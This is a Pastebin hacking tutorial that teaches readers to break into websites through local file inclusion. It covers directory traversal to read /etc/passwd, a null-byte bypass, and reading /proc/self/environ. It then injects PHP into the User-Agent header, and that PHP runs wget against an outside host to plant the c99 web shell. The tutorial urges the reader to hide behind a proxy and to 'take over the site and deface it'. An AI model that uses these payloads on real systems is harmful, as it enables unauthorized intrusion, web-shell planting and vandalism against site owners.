Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Topol's LFI and Shelling through proc/self/environ Tutorial
- ================================================================================================
- Part 1 - Finding a Vulnerable site
- Tip: There are several steps to finding a full vulnerable site
- Say you have a site like this: www.site.com/index.php?page=view.php
- You can check the first vulnerability by adding a ' or a ../
- You should get some sort of error on the page.
- Now we can attempt to browse through the directory of the site by checking the /etc/passwd.
- So we can can replace the "view.php" of the site with /etc/passwd like this:
- www.site.com/index.php?page=/etc/passwd
- If you have the same error as before, don't worry, just keep going up the directories:
- www.site.com/index.php?page=../etc/passwd
- www.site.com/index.php?page=../../etc/passwd
- www.site.com/index.php?page=../../../etc/passwd
- www.site.com/index.php?page=../../../../etc/passwd <-- Say we finally got it
- Now we should get something like this:
- root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin
- daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin
- lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync
- shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt
- mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news
- (Sometimes you will have to add a null byte:
- www.site.com/index.php?page=../../../../etc/passwd%00)
- ================================================================================================
- Part 2 - Getting the /proc/self/environ
- We now have to replace the /etc/passwd with the /proc/self/environ
- www.site.com/index.php?page=../../../../proc/self/environ
- We should get something like this:
- DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1
- HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png,
- image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
- HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac
- HTTP_HOST=www.example.com HTTP_REFERER=http://www.site.com/index.php?view=../../../../etc/passwd
- HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
- REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665
- REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
- SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php
- SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster@example.com
- SERVER_NAME=www.example.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0
- SERVER_SIGNATURE= Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2
- mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
- Server at http://www.site.com Port 80
- Congrats, you got the /proc/self/environ!
- ================================================================================================
- Part 3 - Shelling the site
- Now that you got your /proc/self/environ,
- you might be able to shell it.
- Assuming that you use firefox, you need to download a tool called Tamper Data which is an Add-On. The link is right here: https://addons.mozilla.org/en-US/firefox/addon/tamper-data/
- Now that you have it downloaded, you can find it in the "Tools" section of the Firefox Taskbar.
- So open Tamper Data on www.site.com/index.php?page=../../../../proc/self/environ and click "Start Tamper". (DO NOT GO ON ANY OTHER PAGES OR THE /proc/self/environ WONT LOAD). Now refresh the page. It is going to give you 3 options. Click "Tamper". Now in the User-Agent, you need to add your shell. For this we are going to use the c99 shell. (ALWAYS USE A PROXY/VPN, c99 LEAVES LOGS). So add this in your User-Agent:
- <?system(‘wget http://www.sh3ll.org/c99.txt? -O c99.php’);?>
- Now press ok. Now it should load, and you can find your shell in www.site.com/c99.php
- Congrats, now you can take over the site and deface it. Have fun!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement